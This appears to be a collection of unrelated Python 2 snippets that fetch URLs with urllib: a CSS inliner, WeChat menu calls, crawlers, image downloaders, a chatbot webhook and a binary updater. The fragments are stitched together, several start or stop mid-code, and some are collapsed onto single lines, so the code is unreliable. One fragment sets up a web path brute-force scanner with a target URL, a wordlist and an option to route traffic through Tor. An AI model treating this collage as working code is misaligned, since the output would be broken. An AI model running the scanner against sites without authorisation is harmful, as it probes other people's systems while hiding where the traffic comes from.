    commonshelperCats = list(set(commonshelperCats))
    galleries = list(set(galleries))

    for (lang, project, article) in usage:
        pywikibot.output(lang + project + article)

    return (commonshelperCats, usage, galleries)
def perform(self, document, sourceHTML, sourceURL, srcPrefix):
    aggregateCSS = ""

    if len(srcPrefix) and not srcPrefix.endswith('/'):
        srcPrefix = srcPrefix + '/'

    # retrieve CSS rel links from html pasted and aggregate into one string
    CSSRelSelector = CSSSelector("link[rel=stylesheet],link[rel=StyleSheet],link[rel=STYLESHEET]")
    matching = CSSRelSelector.evaluate(document)
    for element in matching:
        try:
            csspath = element.get("href")
            if len(sourceURL):
                if element.get("href").lower().find("http://", 0) < 0:
                    parsedUrl = urlparse.urlparse(sourceURL)
                    csspath = urlparse.urljoin(parsedUrl.scheme + "://" + parsedUrl.hostname, csspath)
            f = urllib.urlopen(csspath)
            aggregateCSS += ''.join(f.read())
            element.getparent().remove(element)
        except:
            raise IOError('The stylesheet ' + element.get("href") + ' could not be found')

    # include inline style elements
    print aggregateCSS
    CSSStyleSelector = CSSSelector("style,Style")
    matching = CSSStyleSelector.evaluate(document)
    for element in matching:
        aggregateCSS += element.text
        element.getparent().remove(element)

    # convert document to a style dictionary compatible with etree
    styledict = self.getView(document, aggregateCSS)

    # set inline style attribute if not one of the elements not worth styling
    ignoreList = ['html', 'head', 'title', 'meta', 'link', 'script',
                  'repeater', 'singleline', 'multiline', 'br', 'layout']
    for element, style in styledict.items():
        if element.tag not in ignoreList:
            v = style.getCssText(separator=u'')
            element.set('style', v)

    # convert tree back to plain text html
    self.convertedHTML = etree.tostring(document, method="xml", pretty_print=True, encoding='UTF-8')
    # tedious raw conversion of line breaks
    self.convertedHTML = self.convertedHTML.replace('&#13;', '')

    # We've inline styled the CSS, now do the HTML src tags
    soup = BeautifulSoup(self.convertedHTML)
    for img in soup.find_all("img"):
        img['src'] = srcPrefix + img.get('src')

    # Now we would like to set width and min-width on all our tables
    for table in soup.find_all("table"):
        if table.get('width') is not None:
            width = table.get('width')
            if not width.endswith('%'):
                if table.get('style') is None:
                    style = []
                else:
                    style = table.get('style').split(';')
                style = [x for x in style if x]
                style.append("min-width:" + width + "px")
                style.append("width:" + width + "px")
                table['style'] = ';'.join(style)

    # Might as well go ahead and throw a style tag in the head for iOS fixes
    if soup.html.head is None:
        soup.html.insert(0, soup.new_tag('head'))
    if soup.html.head.style is None:
        soup.html.head.append(soup.new_tag('style', type="text/css"))
    soup.html.head.style.append("""
        a[href^="x-apple-data-detectors:"] {
            color: #000000;
            text-decoration: none;
        }
        a[href^="tel"], a[href^="sms"], a[href^="mailto"] {
            color: #000000;
            text-decoration: none;
        }
    """)

    for img in soup.find_all('img'):
        if 'spacer.gif' in img.get('src'):
            classes = img.get('class')
            if classes is not None:
                if 'w' in classes:
                    img.parent['width'] = img.get('width')
                if 'h' in classes:
                    img.parent['height'] = img.get('height')

    self.convertedHTML = str(soup)
    return self
def check_profanity(text):
    connection = urllib.urlopen("http://www.wdylike.appspot.com/?q=" + text)
    print(connection.read())
    connection.close()
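# A minimal usage sketch for check_profanity() above; the sample string is
# purely illustrative and assumes the wdylike service is still reachable.
if __name__ == '__main__':
    check_profanity("what a nice day")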
def delete(self, accessToken):
    postUrl = "https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=%s" % accessToken
    urlResp = urllib.urlopen(url=postUrl)
    print urlResp.read()
print "Processing date " + str(date) # make new directory try: os.makedirs(date) except OSError: if not os.path.isdir(date): raise links = d.get(date) # filter out null links links = filter(lambda x: x != 'NULL', links) # get images from URLs, then save to directory count=1 for link in links: print "processing link " + str(link) res = urllib.urlopen(link) filename = date + "-" + str(count) + ".jpg" fullfilename = os.path.join(date + "/", filename) out = open(fullfilename, "wb") out.write(res.read()) out.close() count = count + 1
region2property2value = json.loads(freebaseFile.read())

apiKey = open("/cs/research/intelsys/home1/avlachos/freebaseApiKey").read()
mqlreadUrl = 'https://www.googleapis.com/freebase/v1/mqlread'

aliasQueryParams = {
    'key': apiKey,
}

# the limit gives back only one result, which seems to be the most popular and the one we are interested in
aliasQuery = {
    "/common/topic/alias": [],
    "type": "/location/statistical_region",
    "limit": 1
}

region2aliases = {}
for regionName in region2property2value:
    print regionName.encode('utf-8')
    aliasQuery["name"] = regionName
    aliasQueryParams["query"] = json.dumps(aliasQuery)
    aliasUrl = mqlreadUrl + '?' + urllib.urlencode(aliasQueryParams)
    aliasJSON = json.loads(urllib.urlopen(aliasUrl).read())
    region2aliases[regionName] = aliasJSON["result"]["/common/topic/alias"]

with open(sys.argv[2], "wb") as out:
    json.dump(region2aliases, out)

print len(region2aliases), " region names with aliases"
def get_current_selfmenu_info(self, accessToken):
    postUrl = "https://api.weixin.qq.com/cgi-bin/get_current_selfmenu_info?access_token=%s" % accessToken
    urlResp = urllib.urlopen(url=postUrl)
    print urlResp.read()
def getHtml(url):
    return urllib.urlopen(url).read()  # return the page source
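# Hypothetical usage of getHtml() above; the URL is only an example.
page_source = getHtml("http://example.com")
print len(page_source)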
def create(self, postData, accessToken):
    postUrl = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=%s" % accessToken
    if isinstance(postData, unicode):
        postData = postData.encode('utf-8')
    urlResp = urllib.urlopen(url=postUrl, data=postData)
    print urlResp.read()
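# A hedged usage sketch for create() above. The menu payload is a minimal
# illustrative example and "ACCESS_TOKEN" is a placeholder; the class that
# owns this method is not part of the snippet, so the call stays commented.
import json
menu = json.dumps({
    "button": [
        {"type": "click", "name": "Hello", "key": "V1001_HELLO"}
    ]
}, ensure_ascii=False)
# menu_handler.create(menu, "ACCESS_TOKEN")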
def _image(self, node):
    import urllib
    import urlparse
    from reportlab.lib.utils import ImageReader

    nfile = node.get('file')
    if not nfile:
        if node.get('name'):
            image_data = self.images[node.get('name')]
            _logger.debug("Image %s used", node.get('name'))
            s = StringIO(image_data)
        else:
            newtext = node.text
            if self.localcontext:
                res = utils._regex.findall(newtext)
                for key in res:
                    newtext = eval(key, {}, self.localcontext) or ''
            image_data = None
            if newtext:
                image_data = base64.decodestring(newtext)
            if image_data:
                s = StringIO(image_data)
            else:
                _logger.debug("No image data!")
                return False
    else:
        if nfile in self.images:
            s = StringIO(self.images[nfile])
        else:
            try:
                up = urlparse.urlparse(str(nfile))
            except ValueError:
                up = False
            if up and up.scheme:
                # RFC: do we really want to open external URLs?
                # Are we safe from cross-site scripting or attacks?
                _logger.debug("Retrieve image from %s", nfile)
                u = urllib.urlopen(str(nfile))
                s = StringIO(u.read())
            else:
                _logger.debug("Open image file %s ", nfile)
                s = _open_image(nfile, path=self.path)
    try:
        img = ImageReader(s)
        (sx, sy) = img.getSize()
        _logger.debug("Image is %dx%d", sx, sy)
        args = {'x': 0.0, 'y': 0.0, 'mask': 'auto'}
        for tag in ('width', 'height', 'x', 'y'):
            if node.get(tag):
                args[tag] = utils.unit_get(node.get(tag))
        if ('width' in args) and (not 'height' in args):
            args['height'] = sy * args['width'] / sx
        elif ('height' in args) and (not 'width' in args):
            args['width'] = sx * args['height'] / sy
        elif ('width' in args) and ('height' in args):
            # compare the requested aspect ratio against the image's own
            if (float(args['width']) / args['height']) > (float(sx) / sy):
                args['width'] = sx * args['height'] / sy
            else:
                args['height'] = sy * args['width'] / sx
        self.canvas.drawImage(img, **args)
    finally:
        s.close()
def get_challenge(s):
    return urllib.urlopen('http://www.pythonchallenge.com/pc/' + s).read()
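# Illustrative call to get_challenge() above; the path is a placeholder,
# not a real Python Challenge page.
print get_challenge('def/example.html')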
def processRequest(req):
    if req.get("result").get("action") != "yahooWeatherForecast":
        return {}

    global city_names
    city_names = processlocation(req)
    global QR
    global intent_name
    intent_name = processIntentName(req)

    if "ChooseCity" in intent_name:
        QR[0] = "Sector in " + city_names
        QR[1] = "Other City?Specify"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Property Type"
    elif "ChooseSector" in intent_name:
        QR[0] = "(Y)"
        QR[1] = "Other Sector?Specify"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Property Type"
    elif "ChangeType" in intent_name:
        QR[0] = "(Y)"
        QR[1] = "Other Type?Specify"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Change Location"
    elif "ChooseHotProperties" in intent_name:
        QR[0] = "(Y)"
        QR[1] = "Change Location"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Change City"
    elif "ChoosePlotArea" in intent_name:
        QR[0] = "(Y)"
        QR[1] = "Other Area?Specify"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Change Location"
    elif "DefinePriceRange" in intent_name:
        QR[0] = "(Y)"
        QR[1] = "Other Range?Specify"
        QR[2] = "Hot Property"
        QR[3] = "Price Range"
        QR[4] = "Land Area"
        QR[5] = "Change Location"

    city_names = processlocation(req)
    sector_names = processSector(req)
    property_type = processPropertyType(req)
    unit_property = processUnit(req)
    area_property = processArea(req)
    NoOfDays = processDate(req)
    DateUnit = processDateUnit(req)
    school = processSchool(req)
    malls = processMalls(req)
    transport = processTransport(req)
    security = processSecurity(req)
    airport = processAirport(req)
    fuel = processFuel(req)
    #minimum_value = processMinimum(req)
    maximum_value = processMaximum(req)
    latest = processLatestProperties(req)

    #if minimum_value > maximum_value:
    #    minimum_value, maximum_value = maximum_value, minimum_value
    #else:
    #    minimum_value, maximum_value = minimum_value, maximum_value

    baseurl = ("https://aarz.pk/bot/index.php?city_name=" + city_names +
               "&sector_name=" + sector_names +
               "&minPrice=" + maximum_value +
               "&type=" + property_type +
               "&LatestProperties=" + latest +
               "&UnitArea=" + area_property +
               "&Unit=" + unit_property +
               "&school=" + school +
               "&airport=" + airport +
               "&transport=" + transport +
               "&security=" + security +
               "&shopping_mall=" + malls +
               "&fuel=" + fuel)
    result = urllib.urlopen(baseurl).read()
    data = json.loads(result)
    res = makeWebhookResult(data)
    return res
def get_data(self):
    """ Return the contents of the artifact """
    url = "{}artifact/{}".format(self.build_url, self.artifact_dict['relativePath'])
    url_data = urllib.urlopen(url).read()
    return url_data
"class %%% has-a function named *** that takes self and @@@ parameters.", "*** = %%%()": "Set *** to an instance of class %%%.", "***.***(@@@)": "From *** get the *** function, and call it with parameters self, @@@.", "***.*** = '***'": "From *** get the *** attribute and set it to '***'." } # do they want to drill phrases first PHRASE_FIRST = False if len(sys.argv) == 2 and sys.argv[1] == "english": PHRASE_FIRST = True # load up the words from the website for word in urlopen(WORD_URL).readlines(): WORDS.append(word.strip()) def convert(snippet, phrase): class_names = [w.capitalize() for w in random.sample(WORDS, snippet.count("%%%"))] other_names = random.sample(WORDS, snippet.count("***")) results = [] param_names = [] for i in range(0, snippet.count("@@@")): param_count = random.randint(1,3) param_names.append(', '.join(random.sample(WORDS, param_count))) for sentence in snippet, phrase:
def get_jsonparsed_data(url):
    d = json.load(urlopen(url))
    return d
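# Hypothetical usage of get_jsonparsed_data() above; the URL is an example
# and is assumed to return a JSON document.
data = get_jsonparsed_data("http://example.com/api/data.json")
print data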
import urllib, sys, os, md5

files = "orange", "corn", "statc", "orangeom", "orangene", "_orngCRS"

baseurl = "http://www.ailab.si/orange/download/binaries/%i%i/" % sys.version_info[:2]
fleurl = baseurl + "%s.pyd"

op = filter(lambda x: x[-7:].lower() in ["\\orange", "/orange"], sys.path)
if not op:
    print "Orange is not found on the Python's path"
    sys.exit(1)  # nothing to update; op[0] below would otherwise raise IndexError

print "Downloading to %s (for Python %i.%i)" % (op[0], sys.version_info[0], sys.version_info[1])
os.chdir(op[0])

def rep(blk_cnt, blk_size, tot_size):
    print "\rDownloading %s: %i of %i" % (fle, min(tot_size, blk_cnt * blk_size), tot_size),

repository_stamps = dict([tuple(x.split()) for x in urllib.urlopen(baseurl + "stamps_pyd.txt") if x.strip()])

for fle in files:
    if os.path.exists(fle + ".pyd") and repository_stamps[fle + ".pyd"] == md5.md5(file(fle + ".pyd", "rb").read()).hexdigest().upper():
        print "\nSkipping %s" % fle,
    else:
        print "\nDownloading %s" % fle,
        urllib.urlretrieve(fleurl % fle, fle + ".temp", rep)
        if os.path.exists(fle + ".pyd"):
            os.remove(fle + ".pyd")
        os.rename(fle + ".temp", fle + ".pyd")
parser.add_argument("-t", "--target", help="The URL of the TARGET to scan.", required=True) parser.add_argument("-w", "--wordlist", help="The paths to locate.", required=True) parser.add_argument("--validation", help="Try to find a string to validate the results.", required=False) parser.add_argument("--extension", help="Add an extension.", required=False) parser.add_argument("--threads", help="Number of threads [default=10].", required=False) parser.add_argument("--tor-host", help="Tor server.", required=False) parser.add_argument("--tor-port", help="Tor port server.", required=False) args = parser.parse_args() if args.tor_host: print_message(" Opening Tor socket... ") socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.tor_host, int(args.tor_port), True) socket.socket = socks.socksocket socket.create_connection = create_tor_connection print_message("OK (" + urlopen('http://ip.42.pl/raw').read() + ").\n") if args.target and args.wordlist: if (os.path.isfile(args.wordlist)): words = [] print_message(" Reading the list... ") file = open(args.wordlist) for line in file.readlines(): words.append(line.strip()) file.close() count_paths = locale.format("%d", len(words), grouping=True) print_message("OK.\n\tThe selected file contains " + count_paths + " paths.\n") final_list = words; if args.extension: print_message("\t Adding extension " + args.extension + " ... ") for path in words:
def crawl_problem_statement(tipo, url_problema):
    global delay
    f = open('enunciados.txt', 'a')

    while True:
        try:
            pagina = urllib.urlopen(url_problema)
            delay = max(1, delay / 2)
            break
        except IOError:
            print('\nIOError: Delaying ' + str(delay) + ' time.\n')
            time.sleep(delay)
            delay = min(2 * delay, 256)

    contenido = pagina.read()
    contenido = re.sub('\\t', ' ', contenido)
    contenido = re.sub('\\n', ' ', contenido)

    # view-source:http://www.artofproblemsolving.com/Forum/viewtopic.php?f=37&t=5560
    # http://www.regular-expressions.info/lookaround.html
    enunciados = re.findall('\<div class="postbody"\>.*?\</div\> ', contenido, re.S)
    assert len(enunciados) > 0

    tipo_str = get_tipo_str(tipo)
    enunciado = enunciados[0]
    #f.write(enunciado)
    #f.write(str(len(enunciados)))
    #f.write('\n')
    #f.close()

    enunciado = re.sub('\\xc3\\xa1', 'a', enunciado)
    enunciado = re.sub('\\xc3\\x81', 'A', enunciado)
    enunciado = re.sub('\\xc3\\xa9', 'e', enunciado)
    enunciado = re.sub('\\xc3\\x89', 'E', enunciado)
    enunciado = re.sub('\\xc3\\xad', 'i', enunciado)
    enunciado = re.sub('\\xc3\\x93', 'o', enunciado)
    enunciado = re.sub('\\xc3\\xb3', 'o', enunciado)
    enunciado = re.sub('\\xc3\\xba', 'u', enunciado)
    enunciado = re.sub('\\xc3\\xb1', 'ENIE', enunciado)
    enunciado = re.sub('\\xc3\\x91', 'ENIE', enunciado)
    enunciado = re.sub('\\xc3\\x97', ' X ', enunciado)
    enunciado = re.sub('\\xc3a', 'a', enunciado)
    enunciado = re.sub('\\xc3e', 'e', enunciado)
    enunciado = re.sub('\\xc3i', 'i', enunciado)
    enunciado = re.sub('\\xc3o', 'o', enunciado)
    enunciado = re.sub('\\xc3u', 'u', enunciado)
    enunciado = re.sub('\\xc2\\xba', ' DEG ', enunciado)        # ^circ symbol
    enunciado = re.sub('\\xc2\\xb0', ' DEG ', enunciado)        # ^circ symbol
    enunciado = re.sub('\\xc2\\xbf', '', enunciado)             # inverted question marks
    enunciado = re.sub('\\xc2\\xa1', ' ', enunciado)            # inverted exclamation marks
    enunciado = re.sub('\\xc2\\xb7', ' BULLET ', enunciado)     # bullets
    enunciado = re.sub('\\xe2\\x80\\x9c', ' ', enunciado)       # "
    enunciado = re.sub('\\xe2\\x80\\x9d', ' ', enunciado)       # "
    enunciado = re.sub('\\xc2\\xb1', ' PLUSMINUS ', enunciado)  # +-

    latex = ''
    for x in re.findall('title="[^"]+"', enunciado, re.I):
        latex = latex + ' $' + x[7: len(x) - 1] + '$ '
    enunciado = re.sub('\<[^\>]+\>', ' ', enunciado)
    enunciado = enunciado + latex

    datos_problema = (url_problema, tipo_str, enunciado)
    datos_problema_str = str(datos_problema)
    f.write(datos_problema_str)
    f.write('\n')
def get_poster(id, url):
    pic = urllib.urlopen(url).read()
    file_name = 'poster/%s.jpg' % id
    f = file(file_name, "wb")
    f.write(pic)
    f.close()
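# Hedged usage sketch for get_poster() above: the id and URL are made up,
# and a 'poster/' directory is assumed to exist beside the script.
get_poster("sample_id", "http://example.com/sample.jpg")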